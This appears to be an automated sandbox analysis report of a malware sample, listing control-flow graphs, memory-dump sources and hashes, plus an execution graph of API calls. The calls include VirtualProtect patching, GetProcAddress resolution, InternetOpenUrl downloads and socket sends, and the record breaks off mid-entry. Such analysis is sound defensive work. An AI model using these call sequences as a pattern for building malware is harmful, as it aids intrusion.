                                                                                            Function 00007FF848B6A891 Relevance: 1.2, Instructions: 1241COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 803 7ff848b6a891-7ff848b6a8cb 805 7ff848b6a95c-7ff848b6a96f 803->805 806 7ff848b6a8d1-7ff848b6a916 call 7ff848b69970 call 7ff848b65870 803->806 811 7ff848b6a9b1-7ff848b6a9b4 805->811 812 7ff848b6a971-7ff848b6a989 805->812 806->805 819 7ff848b6a918-7ff848b6a936 806->819 814 7ff848b6aa56-7ff848b6aa67 811->814 815 7ff848b6a9b5-7ff848b6a9d1 811->815 817 7ff848b6a98b-7ff848b6a9af 812->817 818 7ff848b6a9d3-7ff848b6a9ea call 7ff848b65870 call 7ff848b65fd0 812->818 824 7ff848b6aaa9-7ff848b6aab6 814->824 825 7ff848b6aa69-7ff848b6aa77 814->825 815->818 817->811 818->814 835 7ff848b6a9ec-7ff848b6a9fe 818->835 819->805 822 7ff848b6a938-7ff848b6a95b 819->822 828 7ff848b6aab7-7ff848b6aac1 824->828 829 7ff848b6ab53-7ff848b6ab61 824->829 827 7ff848b6aa7a 825->827 831 7ff848b6aa7b-7ff848b6aa89 827->831 832 7ff848b6aac7-7ff848b6aad1 828->832 833 7ff848b6aac3-7ff848b6aac4 828->833 841 7ff848b6ab66-7ff848b6ab84 829->841 842 7ff848b6ab63-7ff848b6ab65 829->842 834 7ff848b6aad3-7ff848b6aaf5 call 7ff848b69970 831->834 840 7ff848b6aa8b-7ff848b6aa8e 831->840 832->834 833->832 834->829 848 7ff848b6aaf7-7ff848b6ab09 834->848 835->827 845 7ff848b6aa00 835->845 846 7ff848b6aa92-7ff848b6aaa8 840->846 847 7ff848b6ab85-7ff848b6ab89 841->847 842->841 849 7ff848b6aa46-7ff848b6aa55 845->849 850 7ff848b6aa02-7ff848b6aa0a 845->850 846->824 851 7ff848b6ab8b-7ff848b6abb6 847->851 852 7ff848b6abd3-7ff848b6ac13 call 7ff848b69970 * 2 call 7ff848b65870 847->852 848->847 858 7ff848b6ab0b 848->858 850->831 854 7ff848b6aa0c-7ff848b6aa11 850->854 855 7ff848b6acac-7ff848b6acbf 851->855 856 7ff848b6abbc-7ff848b6abd0 851->856 852->855 882 7ff848b6ac19-7ff848b6ac4c 852->882 854->846 859 7ff848b6aa13-7ff848b6aa34 call 7ff848b65c10 854->859 871 7ff848b6ad01 855->871 872 7ff848b6acc1-7ff848b6acd6 855->872 856->852 861 7ff848b6ab0d-7ff848b6ab2b call 7ff848b65c10 858->861 862 7ff848b6ab51-7ff848b6ab52 858->862 859->814 868 7ff848b6aa36-7ff848b6aa44 859->868 861->829 875 7ff848b6ab2d-7ff848b6ab50 861->875 868->849 873 7ff848b6ad02-7ff848b6ad09 871->873 877 7ff848b6ad0b-7ff848b6ad0e 872->877 879 7ff848b6acd8 872->879 873->877 875->862 880 7ff848b6ad22-7ff848b6ad2e 877->880 881 7ff848b6ad10-7ff848b6ad20 877->881 883 7ff848b6acdb-7ff848b6acee 879->883 884 7ff848b6ad3e-7ff848b6ad47 880->884 885 7ff848b6ad30-7ff848b6ad3b 880->885 881->884 890 7ff848b6ac4e-7ff848b6ac6a 882->890 891 7ff848b6ac95-7ff848b6ac9e 882->891 883->873 887 7ff848b6acf0-7ff848b6acf1 883->887 888 7ff848b6adb8-7ff848b6adc5 884->888 889 7ff848b6ad49-7ff848b6ad4b 884->889 885->884 892 7ff848b6acf2-7ff848b6ad00 887->892 895 7ff848b6adc7-7ff848b6adda 888->895 894 7ff848b6ad4d 889->894 889->895 890->883 901 7ff848b6ac6c-7ff848b6ac71 890->901 893 7ff848b6aca0-7ff848b6acab 891->893 892->884 897 7ff848b6ad4f-7ff848b6ad67 call 7ff848b65c10 894->897 898 7ff848b6ad93-7ff848b6adb7 894->898 899 7ff848b6ade1-7ff848b6ae13 call 7ff848b69970 call 7ff848b65870 895->899 900 7ff848b6addc call 7ff848b69970 895->900 897->898 903 7ff848b6adbd-7ff848b6addc call 7ff848b69970 898->903 904 7ff848b6af19-7ff848b6af4a 898->904 899->904 918 7ff848b6ae19-7ff848b6ae39 899->918 900->899 901->892 902 7ff848b6ac73-7ff848b6ac93 901->902 902->893 903->899 919 7ff848b6af4c-7ff848b6af77 904->919 920 7ff848b6af94-7ff848b6afd6 call 7ff848b69970 * 2 call 7ff848b65870 904->920 925 7ff848b6aeba-7ff848b6aecb 918->925 926 7ff848b6ae3b-7ff848b6ae5b 918->926 922 7ff848b6b10e-7ff848b6b163 919->922 923 7ff848b6af7d-7ff848b6af93 919->923 920->922 947 7ff848b6afdc-7ff848b6affa 920->947 941 7ff848b6b169-7ff848b6b1be call 7ff848b69970 * 2 call 7ff848b65870 922->941 942 7ff848b6b236-7ff848b6b241 922->942 923->920 928 7ff848b6aecc-7ff848b6aed8 925->928 926->928 929 7ff848b6ae5d-7ff848b6ae62 926->929 934 7ff848b6aedf-7ff848b6aee0 928->934 935 7ff848b6aeda call 7ff848b6a340 928->935 930 7ff848b6ae64-7ff848b6ae96 call 7ff848b65c10 929->930 931 7ff848b6aee3-7ff848b6aeef 929->931 930->904 945 7ff848b6ae9c-7ff848b6aeda call 7ff848b6a340 930->945 931->904 937 7ff848b6aef1-7ff848b6af18 931->937 934->931 935->934 941->942 973 7ff848b6b1c0-7ff848b6b1eb 941->973 952 7ff848b6b246-7ff848b6b28b 942->952 953 7ff848b6b243-7ff848b6b245 942->953 945->934 947->922 951 7ff848b6b000-7ff848b6b01a 947->951 955 7ff848b6b01c-7ff848b6b01f 951->955 956 7ff848b6b073 951->956 961 7ff848b6b315-7ff848b6b327 952->961 962 7ff848b6b291-7ff848b6b2d1 call 7ff848b69970 call 7ff848b65870 952->962 953->952 959 7ff848b6b0a0-7ff848b6b0e2 call 7ff848b6a340 955->959 960 7ff848b6b021-7ff848b6b03a 955->960 963 7ff848b6b0e4 956->963 964 7ff848b6b075-7ff848b6b07a 956->964 959->963 967 7ff848b6b03c-7ff848b6b053 960->967 968 7ff848b6b055-7ff848b6b067 960->968 982 7ff848b6b369 961->982 983 7ff848b6b329-7ff848b6b367 961->983 962->961 991 7ff848b6b2d3-7ff848b6b2ec call 7ff848b673d0 962->991 963->922 966 7ff848b6b0e6-7ff848b6b0f9 963->966 970 7ff848b6b07c-7ff848b6b09b call 7ff848b65c10 964->970 971 7ff848b6b0fb-7ff848b6b10d 964->971 966->971 975 7ff848b6b06b-7ff848b6b071 967->975 968->975 970->959 980 7ff848b6b1ed-7ff848b6b1ff 973->980 981 7ff848b6b22a-7ff848b6b235 973->981 975->956 980->942 987 7ff848b6b201-7ff848b6b227 980->987 983->982 987->981 993 7ff848b6b2f1-7ff848b6b301 991->993 994 7ff848b6b303-7ff848b6b314 993->994
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2246023822.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848b60000_IB9876789000.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 631862d55042f569f72cc0bab5c16e1156c20418bac6260a2a93b392dcd1839b
                                                                                            • Instruction ID: b26bd5ce8702a13f43c5df9191c58c6ff3ea618df6c68611a471a3496a6e8022
                                                                                            • Opcode Fuzzy Hash: 631862d55042f569f72cc0bab5c16e1156c20418bac6260a2a93b392dcd1839b
                                                                                            • Instruction Fuzzy Hash: 8082553051CB868FE719EB28C4804A1B7E1FF95341F1445BED48AC76A6EF35E896C782
                                                                                            Function 00007FF848B63140 Relevance: 1.0, Instructions: 994COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2246023822.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848b60000_IB9876789000.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 56131a95839e0b345a0d8a0511a9e2b7cf52a40935272c2836a7dbb44af3349d
                                                                                            • Instruction ID: 1323b975a1d368688546ee1fdf3f8535f64ee4e37b96c918002103a6402cf428
                                                                                            • Opcode Fuzzy Hash: 56131a95839e0b345a0d8a0511a9e2b7cf52a40935272c2836a7dbb44af3349d
                                                                                            • Instruction Fuzzy Hash: FE727531D0C7868FE7699B2488416B57BE1EF91350F1441BDD88E8BED3DF28A846C788
                                                                                            Function 00007FF848B6BD1A Relevance: .8, Instructions: 777COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1228 7ff848b6bd1a-7ff848b6bd39 1230 7ff848b6bd3b-7ff848b6bd50 1228->1230 1231 7ff848b6bd52 1228->1231 1232 7ff848b6bd54-7ff848b6bd59 1230->1232 1231->1232 1234 7ff848b6bd5f-7ff848b6bd6e 1232->1234 1235 7ff848b6be56-7ff848b6be76 1232->1235 1241 7ff848b6bd78-7ff848b6bd79 1234->1241 1242 7ff848b6bd70-7ff848b6bd76 1234->1242 1238 7ff848b6bec7-7ff848b6bed2 1235->1238 1239 7ff848b6be78-7ff848b6be7e 1238->1239 1240 7ff848b6bed4-7ff848b6bee3 1238->1240 1244 7ff848b6be84-7ff848b6bea5 call 7ff848b676a8 1239->1244 1245 7ff848b6c342-7ff848b6c397 call 7ff848b66fc0 1239->1245 1250 7ff848b6bef9 1240->1250 1251 7ff848b6bee5-7ff848b6bef7 1240->1251 1243 7ff848b6bd7b-7ff848b6bd92 1241->1243 1242->1243 1243->1235 1255 7ff848b6beaa-7ff848b6bec4 1244->1255 1281 7ff848b6c399-7ff848b6c3b9 call 7ff848b63138 1245->1281 1282 7ff848b6c3e1-7ff848b6c3eb 1245->1282 1254 7ff848b6befb-7ff848b6bf00 1250->1254 1251->1254 1256 7ff848b6bf8c-7ff848b6bfa0 1254->1256 1257 7ff848b6bf06-7ff848b6bf28 call 7ff848b676a8 1254->1257 1255->1238 1258 7ff848b6bfa2-7ff848b6bfa8 1256->1258 1259 7ff848b6bff0-7ff848b6bfff 1256->1259 1274 7ff848b6bf2a-7ff848b6bf54 1257->1274 1275 7ff848b6bf56-7ff848b6bf57 1257->1275 1261 7ff848b6bfaa-7ff848b6bfc5 1258->1261 1262 7ff848b6bfc7-7ff848b6bfdf 1258->1262 1271 7ff848b6c00c 1259->1271 1272 7ff848b6c001-7ff848b6c00a 1259->1272 1261->1262 1273 7ff848b6bfe8-7ff848b6bfeb 1262->1273 1278 7ff848b6c00e-7ff848b6c013 1271->1278 1272->1278 1279 7ff848b6c198-7ff848b6c1a7 1273->1279 1280 7ff848b6bf59-7ff848b6bf60 1274->1280 1275->1280 1283 7ff848b6c31f-7ff848b6c320 1278->1283 1284 7ff848b6c019-7ff848b6c01c 1278->1284 1293 7ff848b6c1a9-7ff848b6c1ad 1279->1293 1294 7ff848b6c1f7-7ff848b6c24d call 7ff848b63070 1279->1294 1280->1256 1290 7ff848b6bf62-7ff848b6bf87 call 7ff848b676d0 1280->1290 1321 7ff848b6c3be-7ff848b6c3d1 1281->1321 1286 7ff848b6c3ed-7ff848b6c3f5 1282->1286 1287 7ff848b6c3f6-7ff848b6c407 1282->1287 1289 7ff848b6c323-7ff848b6c332 1283->1289 1291 7ff848b6c01e-7ff848b6c03b call 7ff848b60388 1284->1291 1292 7ff848b6c064 1284->1292 1286->1287 1295 7ff848b6c409-7ff848b6c411 1287->1295 1296 7ff848b6c412-7ff848b6c45f call 7ff848b69970 1287->1296 1309 7ff848b6c333-7ff848b6c33b 1289->1309 1290->1256 1320 7ff848b6c30e-7ff848b6c31e 1290->1320 1291->1292 1332 7ff848b6c03d-7ff848b6c062 1291->1332 1297 7ff848b6c066-7ff848b6c06b 1292->1297 1303 7ff848b6c1af-7ff848b6c1eb 1293->1303 1304 7ff848b6c1ed 1293->1304 1357 7ff848b6c2be-7ff848b6c2c4 1294->1357 1358 7ff848b6c24f-7ff848b6c253 1294->1358 1295->1296 1341 7ff848b6c471 1296->1341 1342 7ff848b6c461-7ff848b6c46f 1296->1342 1306 7ff848b6c16c-7ff848b6c180 1297->1306 1307 7ff848b6c071-7ff848b6c07d 1297->1307 1311 7ff848b6c1ef-7ff848b6c1f4 1303->1311 1304->1311 1322 7ff848b6c181-7ff848b6c18f 1306->1322 1307->1245 1317 7ff848b6c083-7ff848b6c092 1307->1317 1309->1245 1315 7ff848b6c1f6 1311->1315 1316 7ff848b6c264-7ff848b6c278 1311->1316 1315->1294 1324 7ff848b6c27a-7ff848b6c2a5 call 7ff848b63070 1316->1324 1325 7ff848b6c2c7-7ff848b6c2d3 call 7ff848b65870 1316->1325 1326 7ff848b6c094-7ff848b6c0a3 1317->1326 1327 7ff848b6c0a5-7ff848b6c0b2 call 7ff848b60388 1317->1327 1345 7ff848b6c3dc-7ff848b6c3df 1321->1345 1346 7ff848b6c3d3-7ff848b6c3db 1321->1346 1331 7ff848b6c195-7ff848b6c196 1322->1331 1354 7ff848b6c2aa-7ff848b6c2b2 1324->1354 1338 7ff848b6c2d4-7ff848b6c2ec 1325->1338 1351 7ff848b6c0b8-7ff848b6c0be 1326->1351 1327->1351 1331->1279 1332->1297 1338->1245 1347 7ff848b6c2ee-7ff848b6c2fe 1338->1347 1350 7ff848b6c473-7ff848b6c478 1341->1350 1342->1350 1345->1282 1346->1345 1353 7ff848b6c300-7ff848b6c30b 1347->1353 1355 7ff848b6c48f-7ff848b6c495 1350->1355 1356 7ff848b6c47a-7ff848b6c48d call 7ff848b60810 1350->1356 1359 7ff848b6c0f3-7ff848b6c0f8 1351->1359 1360 7ff848b6c0c0-7ff848b6c0ed 1351->1360 1353->1320 1354->1289 1364 7ff848b6c2b4-7ff848b6c2b7 1354->1364 1362 7ff848b6c49c-7ff848b6c4a3 1355->1362 1363 7ff848b6c497 call 7ff848b63088 1355->1363 1356->1362 1357->1325 1358->1338 1366 7ff848b6c255-7ff848b6c25f 1358->1366 1359->1245 1361 7ff848b6c0fe-7ff848b6c11e 1359->1361 1360->1359 1372 7ff848b6c132-7ff848b6c162 call 7ff848b67b00 1361->1372 1373 7ff848b6c120-7ff848b6c12e 1361->1373 1363->1362 1364->1309 1369 7ff848b6c2b9 1364->1369 1366->1245 1369->1353 1374 7ff848b6c2bb 1369->1374 1379 7ff848b6c167-7ff848b6c16a 1372->1379 1373->1322 1376 7ff848b6c130-7ff848b6c131 1373->1376 1374->1357 1376->1372 1379->1279
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2246023822.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848b60000_IB9876789000.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8468d8db404c67fc49b9e208948ecdafbe8cd86d1ea94316ebc07e76322121e6
                                                                                            • Instruction ID: 9faff8704264f147f09a629ceb4923eb109d6b7859897ecee85fe155f80f9644
                                                                                            • Opcode Fuzzy Hash: 8468d8db404c67fc49b9e208948ecdafbe8cd86d1ea94316ebc07e76322121e6
                                                                                            • Instruction Fuzzy Hash: 49320830A0CA0A8FDB69EB2C9465A7977E1FF55340F1401BEE48ED7592DF24EC428746
                                                                                            Function 00007FF848C4026B Relevance: 2.0, Strings: 1, Instructions: 744COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 188 7ff848c4026b-7ff848c4026d 189 7ff848c4026e-7ff848c4027c 188->189 190 7ff848c403b1-7ff848c403b7 188->190 191 7ff848c40284-7ff848c40286 189->191 195 7ff848c403b9-7ff848c403c8 190->195 193 7ff848c40288-7ff848c40289 191->193 194 7ff848c402f7-7ff848c40306 191->194 197 7ff848c4028b 193->197 198 7ff848c4024f-7ff848c4026a 193->198 199 7ff848c40307-7ff848c40309 194->199 196 7ff848c403c9-7ff848c403e3 195->196 200 7ff848c40428-7ff848c40440 196->200 201 7ff848c403e5-7ff848c403e9 196->201 197->199 202 7ff848c4028d 197->202 198->188 199->190 204 7ff848c4030a-7ff848c40348 199->204 205 7ff848c40442-7ff848c40445 200->205 206 7ff848c404b1-7ff848c404b9 200->206 201->200 207 7ff848c4028f-7ff848c402a0 202->207 208 7ff848c402d4 202->208 204->195 227 7ff848c4034a-7ff848c4034d 204->227 210 7ff848c40447-7ff848c4045a 205->210 211 7ff848c404c6-7ff848c404d0 205->211 206->211 215 7ff848c402a2-7ff848c402b8 207->215 216 7ff848c40235-7ff848c4023b 207->216 208->190 213 7ff848c402da-7ff848c402f5 208->213 217 7ff848c404d1-7ff848c404e7 210->217 220 7ff848c4045c-7ff848c40474 210->220 211->217 213->194 215->190 221 7ff848c402be-7ff848c402d1 215->221 216->190 222 7ff848c40241-7ff848c4024e 216->222 228 7ff848c404e9-7ff848c40500 217->228 229 7ff848c4051c-7ff848c40534 217->229 221->208 222->198 227->196 233 7ff848c4034f 227->233 230 7ff848c40502-7ff848c40505 228->230 231 7ff848c40571-7ff848c40579 228->231 234 7ff848c40507-7ff848c4051a 230->234 235 7ff848c40586-7ff848c40590 230->235 231->235 236 7ff848c40351-7ff848c4035f 233->236 237 7ff848c40396-7ff848c403b0 233->237 234->229 239 7ff848c40592-7ff848c40595 235->239 240 7ff848c40597-7ff848c405a7 235->240 236->237 239->240 244 7ff848c405a9-7ff848c405c0 240->244 245 7ff848c405dc-7ff848c405f4 240->245 247 7ff848c405c2-7ff848c405c5 244->247 248 7ff848c40631-7ff848c40639 244->248 249 7ff848c405c7-7ff848c405da 247->249 250 7ff848c40646-7ff848c40668 247->250 248->250 249->245 254 7ff848c4066a-7ff848c4067a 250->254 255 7ff848c4069d-7ff848c406a8 250->255 256 7ff848c406eb 254->256 257 7ff848c4067c-7ff848c4067e 254->257 263 7ff848c406aa-7ff848c406b9 255->263 264 7ff848c406bc-7ff848c406c5 255->264 259 7ff848c406ed-7ff848c406f1 256->259 260 7ff848c40730-7ff848c4073c 256->260 261 7ff848c406fa-7ff848c40709 257->261 262 7ff848c40680 257->262 259->261 266 7ff848c4073e-7ff848c40772 260->266 267 7ff848c40786-7ff848c4078b 260->267 261->260 265 7ff848c406c6-7ff848c406c7 262->265 268 7ff848c40682-7ff848c4069c 262->268 263->264 264->265 270 7ff848c40778-7ff848c40784 266->270 271 7ff848c40a42-7ff848c40a56 266->271 267->271 273 7ff848c4078c-7ff848c4079e 267->273 268->255 274 7ff848c40785 270->274 278 7ff848c40a57-7ff848c40a79 271->278 275 7ff848c4079f-7ff848c407bd 273->275 274->267 275->271 279 7ff848c407c3-7ff848c407d6 275->279 281 7ff848c407d8-7ff848c407d9 279->281 282 7ff848c40847-7ff848c40856 279->282 281->275 283 7ff848c407db 281->283 284 7ff848c40857-7ff848c40859 282->284 283->284 285 7ff848c407dd 283->285 284->271 286 7ff848c4085a-7ff848c40872 284->286 287 7ff848c407df-7ff848c407f0 285->287 288 7ff848c40824 285->288 292 7ff848c408e3-7ff848c408f0 286->292 293 7ff848c40874-7ff848c40877 286->293 287->274 294 7ff848c407f2-7ff848c40808 287->294 288->271 290 7ff848c4082a-7ff848c40845 288->290 290->282 297 7ff848c408f3 292->297 296 7ff848c40879 293->296 293->297 294->271 298 7ff848c4080e-7ff848c40821 294->298 300 7ff848c4087b-7ff848c408a2 296->300 301 7ff848c408c0 296->301 297->271 302 7ff848c408f9-7ff848c4090c 297->302 298->288 300->271 306 7ff848c408a8-7ff848c408be 300->306 304 7ff848c408c3-7ff848c408e1 301->304 305 7ff848c408c2 301->305 309 7ff848c4090e-7ff848c40912 302->309 310 7ff848c4097d-7ff848c40990 302->310 304->292 305->304 306->271 306->301 311 7ff848c40993 309->311 312 7ff848c40914 309->312 310->311 311->271 314 7ff848c40999-7ff848c409b5 311->314 313 7ff848c40974-7ff848c4097b 312->313 313->310 317 7ff848c409d2-7ff848c409e6 314->317 318 7ff848c409b7-7ff848c409cc 314->318 317->278 319 7ff848c409e8-7ff848c409ed 317->319 318->317 319->313 321 7ff848c409ef 319->321 321->271
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2246368539.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848c40000_IB9876789000.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: A
                                                                                            • API String ID: 0-3554254475
                                                                                            • Opcode ID: d7d3016025e772a19a7bebe7091bc435faf142ee96ffa3138391ef9fed10ac84
                                                                                            • Instruction ID: af7b2313642101e431981433cfd331d428660c101504f0902514f06761a94c2b
                                                                                            • Opcode Fuzzy Hash: d7d3016025e772a19a7bebe7091bc435faf142ee96ffa3138391ef9fed10ac84
                                                                                            • Instruction Fuzzy Hash: 0132263180CA8A8FE7D5FB28C8556B97BE0FF95740F1406BDD04ACB197DB24A886C785
                                                                                            Function 00007FF848B61A22 Relevance: 1.6, APIs: 1, Instructions: 139memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 628 7ff848b61a22-7ff848b61a2f 629 7ff848b61a3a-7ff848b61a4b 628->629 630 7ff848b61a31-7ff848b61a39 628->630 631 7ff848b61a4d-7ff848b61a55 629->631 632 7ff848b61a56-7ff848b61b10 VirtualProtect 629->632 630->629 631->632 635 7ff848b61b18-7ff848b61b40 632->635 636 7ff848b61b12 632->636 636->635
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2246023822.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848b60000_IB9876789000.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 544645111-0
                                                                                            • Opcode ID: a1f439759b71cb07cb35d8245c1c12222692f64000ef5926443de030f02d4d93
                                                                                            • Instruction ID: ab8ed267573dbf2f3d3f3d0a5985c23f5de9c31b4df78143123c8a966189a291
                                                                                            • Opcode Fuzzy Hash: a1f439759b71cb07cb35d8245c1c12222692f64000ef5926443de030f02d4d93
                                                                                            • Instruction Fuzzy Hash: 9441493090CB888FDB19DBA898466F9BBF1EF56321F14426FD049D3692CF746442CB95
                                                                                            Function 00007FF848B60C61 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 637 7ff848b60c61-7ff848b60c6d 638 7ff848b60c6f 637->638 639 7ff848b60c70-7ff848b60c81 637->639 638->639 640 7ff848b60c84-7ff848b60c95 639->640 641 7ff848b60c83 639->641 642 7ff848b60c98-7ff848b60d2c FreeConsole 640->642 643 7ff848b60c97 640->643 641->640 647 7ff848b60d2e 642->647 648 7ff848b60d34-7ff848b60d5b 642->648 643->642 647->648
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2246023822.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848b60000_IB9876789000.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleFree
                                                                                            • String ID:
                                                                                            • API String ID: 771614528-0
                                                                                            • Opcode ID: ffd1776560fe93f5bacb7aaa1a9626fcb6aa05a6a0a40d7ab80776daa8a7aaf6
                                                                                            • Instruction ID: 6f0bd6112b8fa731e15735dc4ab5c5e679451e73ac11e39d154dce1916849d43
                                                                                            • Opcode Fuzzy Hash: ffd1776560fe93f5bacb7aaa1a9626fcb6aa05a6a0a40d7ab80776daa8a7aaf6
                                                                                            • Instruction Fuzzy Hash: 6431147040DB889FDB16EB688844AFA7FF4EF53321F0441AFD089D3592D724644ACB52
                                                                                            Function 00007FF848C411FC Relevance: .3, Instructions: 318COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2246368539.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848c40000_IB9876789000.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b4070bf891ccafa66a779842e619fd4f14c62e8a39586b2d86f9fc8285aad4d1
                                                                                            • Instruction ID: 25434633607d75c5a744b7f814538961464e581eb1b4bc54ecb6056fe6773e60
                                                                                            • Opcode Fuzzy Hash: b4070bf891ccafa66a779842e619fd4f14c62e8a39586b2d86f9fc8285aad4d1
                                                                                            • Instruction Fuzzy Hash: 73916A32D0CAD98FE796EB28985A1B47BE0FF55750F0805FBC4C9C7196EB14A886C385

                                                                                            Execution Graph

                                                                                            Execution Coverage:4.8%
                                                                                            Dynamic/Decrypted Code Coverage:4.2%
                                                                                            Signature Coverage:6.9%
                                                                                            Total number of Nodes:1654
                                                                                            Total number of Limit Nodes:51
                                                                                            execution_graph 52257 1000c7a7 52258 1000c7be 52257->52258 52263 1000c82c 52257->52263 52258->52263 52269 1000c7e6 GetModuleHandleA 52258->52269 52259 1000c872 52260 1000c835 GetModuleHandleA 52264 1000c83f 52260->52264 52262 1000c7dd 52262->52263 52262->52264 52266 1000c800 GetProcAddress 52262->52266 52263->52259 52263->52260 52263->52264 52264->52263 52265 1000c85f GetProcAddress 52264->52265 52265->52263 52266->52263 52267 1000c80d VirtualProtect 52266->52267 52267->52263 52268 1000c81c VirtualProtect 52267->52268 52268->52263 52270 1000c7ef 52269->52270 52276 1000c82c 52269->52276 52281 1000c803 GetProcAddress 52270->52281 52272 1000c872 52273 1000c835 GetModuleHandleA 52279 1000c83f 52273->52279 52274 1000c7f4 52275 1000c800 GetProcAddress 52274->52275 52274->52276 52275->52276 52277 1000c80d VirtualProtect 52275->52277 52276->52272 52276->52273 52276->52279 52277->52276 52278 1000c81c VirtualProtect 52277->52278 52278->52276 52279->52276 52280 1000c85f GetProcAddress 52279->52280 52280->52276 52282 1000c82c 52281->52282 52283 1000c80d VirtualProtect 52281->52283 52285 1000c872 52282->52285 52286 1000c835 GetModuleHandleA 52282->52286 52283->52282 52284 1000c81c VirtualProtect 52283->52284 52284->52282 52287 1000c83f 52286->52287 52287->52282 52287->52287 52288 1000c85f GetProcAddress 52287->52288 52288->52287 52289 43a998 52290 43a9a4 _swprintf CallCatchBlock 52289->52290 52291 43a9b2 52290->52291 52295 43a9dc 52290->52295 52307 445354 20 API calls _Atexit 52291->52307 52293 43a9b7 52308 43a827 26 API calls _Deallocate 52293->52308 52302 444acc EnterCriticalSection 52295->52302 52297 43a9e7 52303 43aa88 52297->52303 52299 43a9c2 __wsopen_s 52302->52297 52304 43aa96 52303->52304 52306 43a9f2 52304->52306 52310 448416 39 API calls 2 library calls 52304->52310 52309 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 52306->52309 52307->52293 52308->52299 52309->52299 52310->52304 52311 414dba 52326 41a51b 52311->52326 52313 414dc3 52336 401fbd 52313->52336 52318 4161f2 52359 401d8c 52318->52359 52321 4161fb 52322 401eea 26 API calls 52321->52322 52323 416207 52322->52323 52324 401eea 26 API calls 52323->52324 52325 416213 52324->52325 52327 41a529 52326->52327 52365 43a88c 52327->52365 52330 41a55c InternetReadFile 52331 41a57f 52330->52331 52331->52330 52332 41a5ac InternetCloseHandle InternetCloseHandle 52331->52332 52335 401eea 26 API calls 52331->52335 52372 401f86 52331->52372 52334 41a5be 52332->52334 52334->52313 52335->52331 52337 401fcc 52336->52337 52383 402501 52337->52383 52339 401fea 52340 404468 52339->52340 52341 40447b 52340->52341 52388 404be8 52341->52388 52343 404490 ctype 52344 404507 WaitForSingleObject 52343->52344 52345 4044e7 52343->52345 52346 40451d 52344->52346 52347 4044f9 send 52345->52347 52392 42051a 56 API calls 52346->52392 52349 404542 52347->52349 52351 401eea 26 API calls 52349->52351 52350 404530 SetEvent 52350->52349 52352 40454a 52351->52352 52353 401eea 26 API calls 52352->52353 52354 404552 52353->52354 52354->52318 52355 401eea 52354->52355 52357 4021b9 52355->52357 52356 4021e8 52356->52318 52357->52356 52398 40262e 52357->52398 52361 40200a 52359->52361 52360 40203a 52360->52321 52361->52360 52406 402654 52361->52406 52363 40202b 52409 4026ba 26 API calls _Deallocate 52363->52409 52370 446aff _strftime 52365->52370 52366 446b3d 52377 445354 20 API calls _Atexit 52366->52377 52368 446b28 RtlAllocateHeap 52369 41a533 InternetOpenW InternetOpenUrlW 52368->52369 52368->52370 52369->52330 52370->52366 52370->52368 52376 442200 7 API calls 2 library calls 52370->52376 52373 401f8e 52372->52373 52378 402325 52373->52378 52375 401fa4 52375->52331 52376->52370 52377->52369 52379 40232f 52378->52379 52381 40233a 52379->52381 52382 40294a 28 API calls 52379->52382 52381->52375 52382->52381 52384 40250d 52383->52384 52386 40252b 52384->52386 52387 40261a 28 API calls 52384->52387 52386->52339 52387->52386 52389 404bf0 